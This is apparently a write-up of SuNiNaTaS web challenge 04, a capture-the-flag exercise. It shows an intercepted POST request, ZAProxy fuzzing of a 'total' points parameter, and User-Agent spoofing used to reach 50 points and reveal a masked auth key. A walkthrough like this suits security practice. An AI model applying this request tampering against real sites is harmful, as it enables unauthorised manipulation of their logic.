challenges
Game 04
Hint: Make your point to 50 & ‘SuNiNaTaS’
Tool: ZAProxy
Initial Request
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| POST http://suninatas.com/challenge/web04/web04_ck.asp HTTP/1.1
host: suninatas.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
Origin: http://suninatas.com
Connection: keep-alive
Referer: http://suninatas.com/challenge/web04/web04.asp
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ
Upgrade-Insecure-Requests: 1
Priority: u=0, i
total=0
|
Solution Steps
- Set fuzz location with numbers from 0 → 23
- Click plus in browser with the same cookie
- Receive alert: “I like the SuNiNaTaS browser!”
- Change User-Agent to include “SuNiNaTaS”:
1
2
3
4
| User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:147.0) Gecko/20100101 SuNiNaTaS/147.0
Cookie: ASPSESSIONIDCCTSAAQT=ONMDDJIBNIEMHLLEJFNAAAOJ
total=25
|
- Fuzz again until points reach 50 (avoid overflow)
Response
1
2
3
4
| <td class="table_top">
<font size="2"><b>Auth key</b></font>
</td>
<td class="table_top">***********************</td>
|